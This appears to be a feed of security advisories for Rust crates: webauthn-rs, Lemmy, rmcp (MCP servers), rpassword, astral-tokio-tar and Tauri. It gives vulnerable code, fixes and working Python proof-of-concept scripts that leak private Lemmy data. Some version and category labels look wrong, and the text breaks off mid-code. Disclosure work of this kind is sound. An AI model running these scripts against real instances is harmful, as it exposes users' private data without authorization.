* `webauthn-authenticator-rs/src/lib.rs` line 274: https://github.com/kanidm/webauthn-rs/blob/197cddf8487a2dbdd5d374e50d80aa1e4682f3ab/webauthn-authenticator-rs/src/lib.rs#L274-L277
* `webauthn-authenticator-rs/src/lib.rs` line 335: https://github.com/kanidm/webauthn-rs/blob/197cddf8487a2dbdd5d374e50d80aa1e4682f3ab/webauthn-authenticator-rs/src/lib.rs#L335-L338

[`str::ends_with()`][ends-with] performs a raw string suffix match _without_ [enforcing a domain label boundary][registerable-suffix]:

| Origin | RP ID | Expected result | Result with incorrect `ends_with` check |
| -- | -- | -- | -- |
| `hermit-crab.example` | `crab.example` | rejected | accepted **(bug!)** |
| `auth.crab.example` | `crab.example` | accepted | accepted (subdomain) |
| `crab.example` | `crab.example` | accepted | accepted (exact match) |
| `hermit-crab.example` | `auth.crab.example` | rejected | rejected |
| `auth.crab.example` | `auth.crab.example` | accepted | accepted (exact match) |

### Fix

When `webauthn-rs-core` v0.5.5 checks if an `Origin` is a valid subdomain of an RP ID, it will check that it ends with the RP ID prefixed with a dot (`.{rp_id}`). `webauthn-rs` v0.5.5 will be fixed by depending on `webauthn-rs-core` v0.5.5. `webauthn-authenticator-rs` v0.5.5 now uses `webauthn-rs-core`'s checks in `WebauthnAuthenticator`. Regression tests for this bug have been added to both libraries.

### Impact

With **both** a non-conforming [client][] implementation and a vulnerable version of `webauthn-rs-core` configured to allow subdomains (not the default), this bug would allow an attacker at `hermit-crab.example` to phish a target's credential for the RP ID `crab.example` by directly proxying a legitimate `navigator.credentials.get()` request on the attacker's domain.

However, _conforming_ [client implementations][client] (ie: all web browsers) will refuse to process WebAuthn requests for an RP ID that does not match the `Origin` of the current page and is not [a related `Origin`](https://www.w3.org/TR/webauthn-3/#sctn-related-origins). In the scenario above with _conforming_ client-side checks, this would force the attacker to change the request's RP ID to `hermit-crab.example` (the attacker's `Origin`). This would also change the RP ID hash, [and `webauthn-rs-core` would reject it](https://github.com/kanidm/webauthn-rs/blob/197cddf8487a2dbdd5d374e50d80aa1e4682f3ab/webauthn-rs-core/src/core.rs#L825-L840) (per [WebAuthn §7.2 Step 15](https://www.w3.org/TR/webauthn-3/#rp-op-verifying-assertion-step-rpid-hash)).
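The fixed boundary check can be expressed with `str::strip_suffix`, which makes the dot requirement explicit. A sketch consistent with the expected results above (function name hypothetical, not the library's internal API):

```rust
// Hedged sketch: accept an origin host for an RP ID only on exact match, or,
// when subdomains are allowed, when the origin ends with ".{rp_id}", i.e. the
// suffix match falls on a domain-label boundary.
fn origin_valid_for_rp_id(origin_host: &str, rp_id: &str, allow_subdomains: bool) -> bool {
    if origin_host == rp_id {
        return true;
    }
    if !allow_subdomains {
        return false;
    }
    match origin_host.strip_suffix(rp_id) {
        Some(prefix) => prefix.ends_with('.'), // "auth." passes, "hermit-" does not
        None => false,
    }
}

fn main() {
    assert!(!origin_valid_for_rp_id("hermit-crab.example", "crab.example", true)); // the bug case
    assert!(origin_valid_for_rp_id("auth.crab.example", "crab.example", true));
    assert!(origin_valid_for_rp_id("crab.example", "crab.example", true));
    assert!(!origin_valid_for_rp_id("hermit-crab.example", "auth.crab.example", true));
    assert!(origin_valid_for_rp_id("auth.crab.example", "auth.crab.example", false));
    println!("origin checks ok");
}
```

`strip_suffix` returns the remaining prefix only when the suffix matches, so the dot test cannot be skipped by a raw `ends_with` match such as `hermit-crab.example`.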
### Severity

Per [WebAuthn §13.4.9](https://www.w3.org/TR/webauthn-3/#sctn-validating-origin):

> The [Relying Party](https://www.w3.org/TR/webauthn-3/#relying-party) MUST NOT accept unexpected values of [origin](https://www.w3.org/TR/webauthn-3/#dom-collectedclientdata-origin), as doing so could allow a malicious website to obtain valid [credentials](https://www.w3.org/TR/credential-management-1/#concept-credential). Although the [scope](https://www.w3.org/TR/webauthn-3/#scope) of WebAuthn credentials prevents their use on domains outside the [RP ID](https://www.w3.org/TR/webauthn-3/#rp-id) they were registered for, the [Relying Party](https://www.w3.org/TR/webauthn-3/#relying-party)’s origin validation serves as an additional layer of protection in case a faulty [authenticator](https://www.w3.org/TR/webauthn-3/#authenticator) fails to enforce credential [scope](https://www.w3.org/TR/webauthn-3/#scope).

Unfortunately, [the chain needed to exploit this bug makes it difficult to classify with the CVSS framework](https://www.first.org/cvss/v4.0/user-guide#Vulnerability-Chaining). Kanidm came up with anywhere between "low" and "high" depending on the approach, and GitHub only provides one CVSS field for everything.

An attacker could easily bypass a _correctly-implemented_ server-side `Origin` check, if they can convince a target to use their authenticator with [an attacker-controlled client device](https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-ps-20220523.html#dfn-t-1.3.2) or [buggy/malicious client application](https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-ps-20220523.html#dfn-t-1.3.1). FIDO's Security Reference [assumes that "the FIDO user device and applications involved in a FIDO operation are trustworthy agents of the user"](https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-ps-20220523.html#dfn-sa-4), and violating that [limits the protections FIDO can provide](https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-ps-20220523.html#discussion), so it would be ridiculous to describe those bypasses as a "high" severity vulnerability. However, `webauthn-rs-core` should take reasonable steps to prevent these sorts of issues where it can, especially when they're part of the WebAuthn specification.

Due to the complex preconditions and non-default configuration required to execute a successful attack, and that it is *not exploitable* in popular web browsers, Kanidm considers this a **low severity** issue.

Affected versions

All versions < 0.5.5

CVSS Vector

CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Unspecified
📦 lemmy_api 📌 All versions < 0 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited
📅 2026-05-06 OSV/crates.io 🔗 Details

Full description

## Summary

Lemmy applies private-community checks in `PostView` and `CommentView`, but several adjacent API views skip the accepted-follower filter. Bob, a registered user who is not an accepted follower, can read private community `sidebar` and `summary` fields. Alice, a former accepted follower, can still read saved and liked private post bodies after she leaves. An unauthenticated visitor can read private community metadata and removed private post names through the modlog.

## Details

`CommunityView::read()` and `CommunityQuery::list()` call `visible_communities_only()`, but they do not add the private-community filter used by post and comment reads:

```rust
query = my_local_user.visible_communities_only(query);
query.first(conn).await.with_lemmy_type(LemmyErrorType::NotFound)
```

`PersonSavedCombinedQuery::list()` and `PersonLikedCombinedQuery::list()` join `community_actions`, but they only filter by the requesting person id. They do not require `community_actions.follow_state = Accepted` when the community has `visibility = Private`.

The modlog query returns `ListingType::All` without a visibility predicate:

```rust
query = match self.listing_type.unwrap_or(ListingType::All) {
    ListingType::All => query,
```

The control paths show the expected check. `PostView::read()` and `CommentView::read()` both filter private communities to accepted followers:

```rust
community::visibility
    .ne(CommunityVisibility::Private)
    .or(community_actions::follow_state.eq(CommunityFollowerState::Accepted))
```

## Proof of Concept

The following script reproduces the leak against a fresh Lemmy instance. Tested against `dessalines/lemmy:nightly` with the default setup account from the sample config. The script opens registration so it can create Alice and Bob.

```python
import requests, random, string

BASE = "http://127.0.0.1:8536/api/v4"  # change to the target Lemmy URL
ADMIN_USER = "lemmy"
ADMIN_PASS = "lemmylemmy"
PASSWORD = "Password123456!"

def req(method, path, token=None, params=None, **body):
    headers = {}
    if token:
        headers["Authorization"] = "Bearer " + token
    return requests.request(method, BASE + path, headers=headers, params=params, json=body or None)

def register(name):
    r = req("POST", "/account/auth/register", username=name, password=PASSWORD,
            password_verify=PASSWORD, email=name + "@example.test")
    r.raise_for_status()
    token = r.json()["jwt"]
    person_id = req("GET", "/account", token).json()["local_user_view"]["person"]["id"]
    return token, person_id

def show(label, response, marker):
    text = response.text
    print("\n" + label + ": HTTP", response.status_code)
    print(text[:700])
    print("contains marker:", marker in text)

suffix = "poc" + "".join(random.choice(string.ascii_lowercase) for _ in range(6))
admin = req("POST", "/account/auth/login", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()["jwt"]
req("PUT", "/site", admin, registration_mode="open", email_verification_required=False)

alice, alice_id = register("alice" + suffix)
bob, _ = register("bob" + suffix)

secret = "SECRET_" + suffix
community = req("POST", "/community", admin, name="priv" + suffix,
                title="Private Proof " + suffix, sidebar=secret + " sidebar",
                summary=secret + " summary", visibility="private").json()["community_view"]["community"]
community_id = community["id"]
post = req("POST", "/post", admin, name="secret post " + suffix,
           community_id=community_id, body=secret + " post body").json()["post_view"]["post"]
post_id = post["id"]

show("Bob reads private community metadata", req("GET", "/community", bob, params={"id": community_id}), secret)
show("Bob direct post read control", req("GET", "/post", bob, params={"id": post_id}), secret)

req("POST", "/community/follow", alice, community_id=community_id, follow=True)
req("POST", "/community/pending_follows/approve", admin, community_id=community_id,
    follower_id=alice_id, approve=True)
req("PUT", "/post/save", alice, post_id=post_id, save=True)
req("POST", "/post/like", alice, post_id=post_id, is_upvote=True)
req("POST", "/community/follow", alice, community_id=community_id, follow=False)

show("Alice direct post read after leaving", req("GET", "/post", alice, params={"id": post_id}), secret)
show("Alice saved list after leaving", req("GET", "/account/saved", alice), secret)
show("Alice liked list after leaving", req("GET", "/account/liked", alice), secret)

mod_comm = req("POST", "/community", admin, name="modlog" + suffix,
               title="Private Modlog " + suffix, sidebar=secret + " modlog sidebar",
               summary=secret + " modlog summary",
               visibility="private").json()["community_view"]["community"]
mod_post = req("POST", "/post", admin, name=secret + " removed post",
               community_id=mod_comm["id"], body="body").json()["post_view"]["post"]
req("POST", "/post/remove", admin, post_id=mod_post["id"], removed=True, reason="poc")

show("Unauthenticated modlog", req("GET", "/modlog", params={"listing_type": "all", "limit": 50}), secret)
```

Output:

```text
Bob reads private community metadata: HTTP 200
contains marker: True
Bob direct post read control: HTTP 404
contains marker: False
Alice direct post read after leaving: HTTP 404
contains marker: False
Alice saved list after leaving: HTTP 200
contains marker: True
Alice liked list after leaving: HTTP 200
contains marker: True
Unauthenticated modlog: HTTP 200
contains marker: True
```

## Impact

Bob can read private community descriptions and sidebars before a moderator approves him. Alice can leave a private community, or a moderator can remove her, and Lemmy still returns private post bodies that Alice saved or liked while she was a member. An unauthenticated visitor can use the public modlog to discover private community metadata and removed private post names.
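The accepted-follower predicate shown in the details section can be modelled as a plain boolean rule, which is the decision each missing view should apply. A sketch of that rule (not Lemmy's Diesel code; names hypothetical):

```rust
// Hedged sketch of the visibility rule the missing views should enforce:
// a private community's data is visible only to admins and accepted followers,
// mirroring `visibility.ne(Private).or(follow_state.eq(Accepted))`.
#[derive(PartialEq)]
enum Visibility {
    Public,
    Private,
}

#[derive(PartialEq)]
enum FollowState {
    NotFollowing,
    Pending,
    Accepted,
}

fn can_read(vis: Visibility, follow: FollowState, is_admin: bool) -> bool {
    is_admin || vis != Visibility::Private || follow == FollowState::Accepted
}

fn main() {
    // Bob: registered but only pending approval; must be denied.
    assert!(!can_read(Visibility::Private, FollowState::Pending, false));
    // Alice after leaving: no longer Accepted; must be denied.
    assert!(!can_read(Visibility::Private, FollowState::NotFollowing, false));
    // Accepted followers and admins keep access.
    assert!(can_read(Visibility::Private, FollowState::Accepted, false));
    assert!(can_read(Visibility::Private, FollowState::NotFollowing, true));
    println!("visibility rule ok");
}
```

Applying this same rule in the community, saved/liked, and modlog queries would make them consistent with `PostView::read()` and `CommentView::read()`.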
## Recommended Fix

Apply the same private-community filter used by `PostView` and `CommentView` to `CommunityView::read()`, `CommunityQuery::list()`, `PersonSavedCombinedQuery::list()`, `PersonLikedCombinedQuery::list()`, and the `ListingType::All` branch of the modlog query. Admins and accepted followers should keep access. Other callers should receive the same `404` behavior as `GET /post` and `GET /comment`.

---

*Found by [aisafe.io](https://aisafe.io)*

Affected versions

All versions < 0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Unspecified
📦 lemmy_api 📌 All versions < 0 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited
📅 2026-05-06 OSV/crates.io 🔗 Details

Full description

## Summary

`read_multi_community()` does not enforce the private-instance setting. On a private instance, an unauthenticated visitor can read multi-community names, titles, summaries, sidebars, owner identities, and member community lists.

## Details

Other read handlers load `local_site` and call `check_private_instance()` before returning data to unauthenticated callers. `read_multi_community()` does not call that helper:

```rust
pub async fn read_multi_community(
    Query(data): Query<GetMultiCommunity>,
    context: Data<LemmyContext>,
    local_user_view: Option<LocalUserView>,
) -> LemmyResult<Json<GetMultiCommunityResponse>> {
    let my_person_id = local_user_view.as_ref().map(|l| l.person.id);
    let id = resolve_multi_community_identifier(&data.name, data.id, &context, &local_user_view)
        .await?
        .ok_or(LemmyErrorType::NoIdGiven)?;
    let multi_community_view =
        MultiCommunityView::read(&mut context.pool(), id, my_person_id).await?;
```

`get_community()`, `list_posts()`, `list_comments()`, `read_person()`, `search()`, and `resolve_object()` all enforce the private-instance guard.

## Proof of Concept

The script creates a multi-community whose metadata contains a marker, turns on `private_instance`, confirms a guarded control endpoint blocks unauthenticated callers, then reads the same multi-community over `GET /multi_community` without authentication.

```python
#!/usr/bin/env python3
import json, random, string
import requests

BASE = "http://127.0.0.1:8536/api/v4"
ADMIN_USER = "lemmy"
ADMIN_PASS = "lemmylemmy"

def api(method, path, token=None, **kw):
    h = kw.pop("headers", {})
    if token:
        h["Authorization"] = "Bearer " + token
    return requests.request(method, BASE + path, headers=h, **kw)

suffix = "multi" + "".join(random.choice(string.ascii_lowercase) for _ in range(6))
secret = "SECRET_MULTI_" + suffix
admin = api("POST", "/account/auth/login",
            json={"username_or_email": ADMIN_USER, "password": ADMIN_PASS}).json()["jwt"]

# Create a multi-community whose title/summary/sidebar embed the marker.
mid = api("POST", "/multi_community", admin, json={
    "name": "m" + suffix,
    "title": secret,
    "summary": secret + " summary",
    "sidebar": secret + " sidebar",
}).json()["multi_community_view"]["multi"]["id"]

# Enable private_instance.
api("PUT", "/site", admin, json={"private_instance": True})
print("private_instance:",
      api("GET", "/site").json()["site_view"]["local_site"]["private_instance"])

# Control: a comparable read endpoint correctly rejects unauthenticated callers.
control = api("GET", "/community/list")
print("unauth /community/list (control):", control.status_code, control.text[:120])

# Leak: read_multi_community returns the private metadata to an unauthenticated caller.
leak = api("GET", "/multi_community", params={"id": mid})
print("unauth /multi_community:", leak.status_code, leak.text[:300])
print("contains secret:", secret in leak.text)
```

Output:

```text
private_instance: True
unauth /community/list (control): 400 {"error":"instance_is_private","cause":"InstanceIsPrivate"}
unauth /multi_community: 200 {"multi_community_view":{"multi":{"title":"SECRET_MULTI_multijwxokm","summary":"SECRET_MULTI_multijwxokm summary","sidebar":"SECRET_MULTI_multijwxokm sidebar"}}}
contains secret: True
```

The control request shows the privacy setting is active. The multi-community endpoint still returns the private metadata.
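The missing guard is a one-line check at the top of the handler. Its behaviour can be sketched as follows (names hypothetical; Lemmy's actual helper takes `&local_user_view` and `&local_site`):

```rust
// Hedged sketch of a check_private_instance-style guard: on a private
// instance, any read by an unauthenticated caller fails before data is loaded.
fn check_private_instance(logged_in: bool, private_instance: bool) -> Result<(), &'static str> {
    if private_instance && !logged_in {
        Err("instance_is_private")
    } else {
        Ok(())
    }
}

fn main() {
    // Unauthenticated caller on a private instance: same rejection the
    // /community/list control shows.
    assert_eq!(check_private_instance(false, true), Err("instance_is_private"));
    // Logged-in callers and public instances pass through.
    assert!(check_private_instance(true, true).is_ok());
    assert!(check_private_instance(false, false).is_ok());
    println!("guard ok");
}
```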
## Impact

An unauthenticated visitor can read multi-community metadata from an instance whose admin configured the site as private. The exposed fields include names, titles, summaries, sidebars, owner identities, and member community lists.

## Recommended Fix

Load `local_site` at the start of `read_multi_community()` and call `check_private_instance(&local_user_view, &local_site)?` before resolving or reading the multi-community.

---

*Found by [aisafe.io](https://aisafe.io)*

Affected versions

All versions < 0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

High
📦 rmcp 📌 All versions < 1.4.0 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
📅 2026-05-06 OSV/crates.io 🔗 Details

Full description

## Summary

Prior to version 1.4.0, the `rmcp` crate's Streamable HTTP server transport (`crates/rmcp/src/transport/streamable_http_server/`) did not validate the incoming `Host` header. This allowed a malicious public website, via a DNS rebinding attack, to send authenticated requests to an MCP server running on the victim's loopback or private-network interface — violating the MCP specification's [transport security guidance](https://modelcontextprotocol.io/specification/2025-06-18/basic/transports#security-warning).

## Impact

An attacker who convinces a victim to visit a malicious page can:

- Enumerate and invoke any tool exposed by a locally-running rmcp-based MCP server.
- Read resources, prompts, and any state accessible via the MCP session.
- Trigger side effects (file writes, shell execution, API calls, etc.) limited only by what tools the victim's server exposes.

Because MCP servers frequently run with the user's privileges and expose developer tooling (filesystems, shells, browser control, language servers, etc.), the practical impact can extend to arbitrary code execution on the victim's machine.

## Affected Versions

`rmcp < 1.4.0` — all prior releases of the Streamable HTTP server transport. Non-HTTP transports (stdio, child-process) are not affected.

## Patched Versions

`rmcp >= 1.4.0` (current: 1.5.1).

## Patch

Fixed in [PR #764](https://github.com/modelcontextprotocol/rust-sdk/pull/764) (commit `8e22aa2`), released as v1.4.0 on 2026-04-09:

- `StreamableHttpServerConfig::allowed_hosts` now defaults to a loopback-only allowlist: `["localhost", "127.0.0.1", "::1"]`.
- All incoming HTTP requests pass through `validate_dns_rebinding_headers()`, which parses the `Host` header and returns HTTP 403 if the host is not on the allowlist.
- Public deployments can configure an explicit allowlist via `StreamableHttpService::with_allowed_hosts(...)`, or opt out (not recommended without an upstream reverse proxy that validates `Host`) via `disable_allowed_hosts()`.

This fix validates the `Host` header only. `Origin` header validation is tracked as a defense-in-depth follow-up in [#822](https://github.com/modelcontextprotocol/rust-sdk/issues/822) and is not required to block the DNS rebinding attack described here — the browser cannot forge the `Host` header sent to the rebound server.

## Workarounds for Unpatched Users

- Upgrade to `rmcp >= 1.4.0`.
- If upgrading is not possible, place the MCP server behind a reverse proxy (e.g. nginx, Caddy) configured to reject requests whose `Host` header is not one of your expected hostnames.
- Do not bind the MCP server to `0.0.0.0` without such a proxy.

## Resources

- PR: https://github.com/modelcontextprotocol/rust-sdk/pull/764
- Issue: https://github.com/modelcontextprotocol/rust-sdk/issues/815
- Follow-up (Origin validation): https://github.com/modelcontextprotocol/rust-sdk/issues/822
- MCP transport security guidance: https://modelcontextprotocol.io/specification/2025-06-18/basic/transports#security-warning

## Related advisories (same class of vulnerability)

- TypeScript SDK: GHSA-w48q-cv73-mx4w
- Python SDK: GHSA-9h52-p55h-vw2f
- Go SDK: GHSA-xw59-hvm2-8pj6
- Java SDK: GHSA-8jxr-pr72-r468
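The allowlist comparison has one subtlety: the `Host` header may carry a port, and IPv6 literals are bracketed. A sketch of such a validation (not rmcp's actual `validate_dns_rebinding_headers()` implementation; names hypothetical):

```rust
// Hedged sketch: strip an optional port from a Host header value, then compare
// the remaining host case-insensitively against a loopback allowlist. DNS
// rebinding is blocked because the browser still sends the attacker's
// hostname in the Host header, which will not match the allowlist.
fn host_allowed(host_header: &str, allowlist: &[&str]) -> bool {
    let host = if let Some(rest) = host_header.strip_prefix('[') {
        // Bracketed IPv6 literal, e.g. "[::1]:8080" -> "::1"
        rest.split(']').next().unwrap_or("")
    } else {
        // "localhost:3000" -> "localhost"; a bare "localhost" is unchanged
        host_header.rsplit_once(':').map(|(h, _)| h).unwrap_or(host_header)
    };
    allowlist.iter().any(|a| a.eq_ignore_ascii_case(host))
}

fn main() {
    let allow = ["localhost", "127.0.0.1", "::1"];
    assert!(host_allowed("localhost:3000", &allow));
    assert!(host_allowed("127.0.0.1", &allow));
    assert!(host_allowed("[::1]:8080", &allow));
    // A rebound public hostname is rejected, i.e. HTTP 403 in the patched server.
    assert!(!host_allowed("attacker.example:80", &allow));
    println!("host validation ok");
}
```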

الإصدارات المتأثرة

All versions < 1.4.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

منخفضة
📦 rpassword 📌 All versions < 7.5.0 📄 مكتبي 🦀 مكتبة Rust crates.io 🎯 فيزيائي ⚪ لم تُستغل 🟢 ترقيع
💬 rpassword maintainers were made aware of a possible issue with a partial password reveal when input is interrupted. To quote @squell: > @conradkleinespel I've confirmed this problem with SequoiaPGP, which I think uses rpassword, e.g.: > > Suppose we use pkill -9 sq in a differe...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

rpassword maintainers were made aware of a possible issue with a partial password reveal when input is interrupted. To quote @squell:

> @conradkleinespel I've confirmed this problem with SequoiaPGP, which I think uses rpassword, e.g.:
>
> Suppose we use `pkill -9 sq` in a different terminal right after the password has been typed in:
>
> ```
> $ sq key generate --userid "barf" --with-password
> Enter password to protect the key: Killed
> $ hello^C
> ```
>
> Where the password I typed in is "hello".

This has been fixed in version v7.5.0 and above.

الإصدارات المتأثرة

All versions < 7.5.0

CVSS Vector

CVSS:3.1/AV:P/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N

منخفضة
📦 astral-tokio-tar 📌 All versions < 0.6.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact In versions 0.6.0 and earlier of astral-tokio-tar, the `unpack_in` API could inadvertently modify the permissions of external (i.e. non-archive) directories outside of the archive. An attacker could use this to construct a tar archive that maliciously changes directory...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Impact

In versions 0.6.0 and earlier of astral-tokio-tar, the `unpack_in` API could inadvertently modify the permissions of external (i.e. non-archive) directories outside of the archive. An attacker could use this to construct a tar archive that maliciously changes directory permissions outside of its intended hierarchy. This flaw only affects directories; individual file permissions cannot be modified via it. See GHSA-j4xf-2g29-59ph for the equivalent flaw in the `tar` crate.

### Patches

Versions 0.6.1 and newer of astral-tokio-tar use `fs::symlink_metadata` rather than `fs::metadata`, avoiding the traversal.

### Workarounds

Users are advised to upgrade to version 0.6.1 or newer to address this advisory. Users should experience no breaking changes as a result of the patch above.

### Resources

- GHSA-j4xf-2g29-59ph for the original `tar` vulnerability

### Attribution

- Reporter: Adam Harvey (@lawngnome)
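The distinction the patch relies on can be demonstrated with the standard library alone. A Unix-only sketch with invented directory names: `fs::metadata` follows a symlink and reports its target, while `fs::symlink_metadata` reports the link itself, which is what an extractor must consult before fixing up permissions:

```rust
use std::fs;
use std::os::unix::fs::symlink;

/// Returns true when `path` is itself a symlink, without following it.
/// This mirrors the patched preference for `fs::symlink_metadata`.
fn is_symlink(path: &std::path::Path) -> std::io::Result<bool> {
    Ok(fs::symlink_metadata(path)?.file_type().is_symlink())
}

fn main() -> std::io::Result<()> {
    // Hypothetical extraction root containing a link that escapes it,
    // mimicking a malicious archive entry.
    let base = std::env::temp_dir().join("symlink_meta_demo");
    let _ = fs::remove_dir_all(&base);
    fs::create_dir_all(base.join("external"))?;
    fs::create_dir_all(base.join("root"))?;
    let link = base.join("root/escape");
    symlink(base.join("external"), &link)?;

    // `fs::metadata` follows the link: a permission fix-up keyed on this
    // result would land on the *external* directory, outside the root.
    assert!(fs::metadata(&link)?.is_dir());

    // `fs::symlink_metadata` sees the link itself, so the escape is visible.
    assert!(is_symlink(&link)?);
    println!("escape detected");
    Ok(())
}
```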

الإصدارات المتأثرة

All versions < 0.6.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U

غير محدد
📦 astral-tokio-tar 📌 All versions < 0.6.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact Versions of astral-tokio-tar prior to 0.6.1 contain a PAX header interpretation bug that allows manipulated entries to be made selectively visible or invisible during extraction with astral-tokio-tar versus other tar implementations. An attacker could use this differe...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Impact

Versions of astral-tokio-tar prior to 0.6.1 contain a PAX header interpretation bug that allows manipulated entries to be made selectively visible or invisible during extraction with astral-tokio-tar versus other tar implementations. An attacker could use this differential to smuggle unexpected files onto a victim's filesystem. See GHSA-j5gw-2vrg-8fgx for a similar desynchronization bug in astral-tokio-tar.

### Patches

Versions 0.6.1 and newer of astral-tokio-tar address this differential.

### Workarounds

Users are advised to upgrade to version 0.6.1 or newer to address this advisory. There is no workaround other than upgrading. Users should experience no breaking changes as a result of the upgrade.

### Resources

- GHSA-j5gw-2vrg-8fgx is a similar PAX desynchronization bug

### Attribution

- Reporter: Adam Harvey (@lawngnome)
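The advisory does not spell out the exact header sequence involved, so the following is only a generic illustration of why PAX interpretation differentials are dangerous: two extractors that disagree on which of two conflicting `path` records wins will write the same archive to different destinations. All names here are invented:

```rust
/// Two plausible ways a tar implementation might resolve conflicting PAX
/// records for the same key. This does not depict astral-tokio-tar's actual
/// bug; it only shows how a disagreement becomes a smuggling primitive.
fn resolve_first_wins(records: &[(&str, &str)], key: &str) -> Option<String> {
    records.iter().find(|(k, _)| *k == key).map(|(_, v)| v.to_string())
}

fn resolve_last_wins(records: &[(&str, &str)], key: &str) -> Option<String> {
    records.iter().rev().find(|(k, _)| *k == key).map(|(_, v)| v.to_string())
}

fn main() {
    // A crafted entry carrying two `path` records for one file.
    let records = [("path", "docs/README.md"), ("path", "../outside/evil.sh")];

    // Implementation A extracts the benign path; implementation B extracts
    // the smuggled one. Same archive, different files on disk.
    assert_eq!(resolve_first_wins(&records, "path").unwrap(), "docs/README.md");
    assert_eq!(resolve_last_wins(&records, "path").unwrap(), "../outside/evil.sh");
    println!("ok");
}
```

A scanner that sees the archive through parser A while the victim extracts with parser B never inspects the file that actually lands on disk, which is the "selectively visible or invisible" differential the advisory describes.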

الإصدارات المتأثرة

All versions < 0.6.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U

غير محدد
📦 tauri 📌 2.0.0 → 2.11.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary A flaw in Tauri's `is_local_url()` function causes it to incorrectly classify remote URLs as trusted local origins on Windows and Android. On these systems, Tauri maps custom URI scheme protocols to `http://<scheme>.localhost/` because those platforms' WebView impleme...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary

A flaw in Tauri's `is_local_url()` function causes it to incorrectly classify remote URLs as trusted local origins on Windows and Android. On these systems, Tauri maps custom URI scheme protocols to `http://<scheme>.localhost/` because those platforms' WebView implementations cannot serve custom URI schemes directly. The issue is that Tauri's check for whether an origin is local only inspects the first subdomain label of the URL. An attacker can abuse this by hosting a page on a domain whose first label matches the custom scheme of the application (e.g. `http://app.attacker.com/`).

Example:

- Local URL: `app://localhost/` → on Android/Windows: `http://app.localhost/`
- The check passes for any URL starting with `http://app.`, including `http://app.evil.com/`

As a result, the attacker page can invoke backend commands that the developer intended to be accessible only to the app's own frontend and that are explicitly restricted from being called by external or remote origins.

### Details

Vulnerable function:

```rust
#[cfg(any(windows, target_os = "android"))]
let local = {
    let protocol_url = self.manager().tauri_protocol_url(uses_https);
    let maybe_protocol = current_url
        .domain()
        .and_then(|d| d.split_once('.')) // BUG: only splits on first dot
        .unwrap_or_default()
        .0;
    protocols.contains_key(maybe_protocol) && scheme == protocol_url.scheme()
};
```

Link: https://github.com/tauri-apps/tauri/blob/1ef6a119b1571d1da0acc08bdb7fd5521a4c6d52/crates/tauri/src/webview/mod.rs#L1680

`split_once('.')` discards everything after the first `.`. For `http://app.evil.com/`, the extracted label is `app`. If the application has registered a protocol named `app`, `protocols.contains_key("app")` returns `true` and the URL is classified as `Origin::Local`. The correct check must assert the full domain is exactly `<protocol>.localhost`.

### PoC

We created a proof of concept app that can be found [here](https://drive.google.com/file/d/1YME6YMSKv69JxFF7Ne0OrZ6tGC_OH7Jw/view?usp=sharing).

The app registers a custom `app://` protocol and exposes a `ping` command restricted to local origins only. It provides a button to open a URL in a WebView, pre-filled with https://app.robbe-bc9.workers.dev/, an attacker-controlled page that invokes `ping` on load. Because the domain's first label matches the registered `app` protocol, `is_local_url()` classifies it as a local origin and the command succeeds.

`capabilities/main.json` contains the following code, which only exposes `ping` locally:

```json
{
  "$schema": "../../../crates/tauri-schema-generator/schemas/capability.schema.json",
  "identifier": "main",
  "local": true,
  "windows": ["*"],
  "permissions": [
    "sample:allow-ping"
  ]
}
```

`src/lib.rs` contains the following code, to register a custom scheme:

```rust
tauri::Builder::default()
    .register_uri_scheme_protocol("app", |_ctx, _request| { ... })
```

### Impact

The attacker page can invoke backend commands that the developer intended to be accessible only to the app's own frontend and that are explicitly restricted from being called by external or remote origins.
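The faulty and corrected host checks can be contrasted in isolation. A sketch under assumptions: the function names are invented, and the real `is_local_url()` additionally compares the URL scheme against the mapped protocol URL:

```rust
/// Buggy shape: keep only the label before the first '.', as the vulnerable
/// `split_once('.')` call does, and ask whether it names a registered protocol.
fn first_label_is_protocol(domain: &str, protocols: &[&str]) -> bool {
    let label = domain.split_once('.').map(|(first, _)| first).unwrap_or("");
    protocols.contains(&label)
}

/// Corrected shape: require the whole host to be exactly `<protocol>.localhost`.
fn is_protocol_localhost(domain: &str, protocols: &[&str]) -> bool {
    protocols.iter().any(|p| domain == format!("{p}.localhost"))
}

fn main() {
    let protocols = ["app"];
    // Legitimate mapped origin: both checks accept it.
    assert!(first_label_is_protocol("app.localhost", &protocols));
    assert!(is_protocol_localhost("app.localhost", &protocols));
    // Attacker domain: the buggy check accepts it, the fixed one rejects it.
    assert!(first_label_is_protocol("app.evil.com", &protocols));
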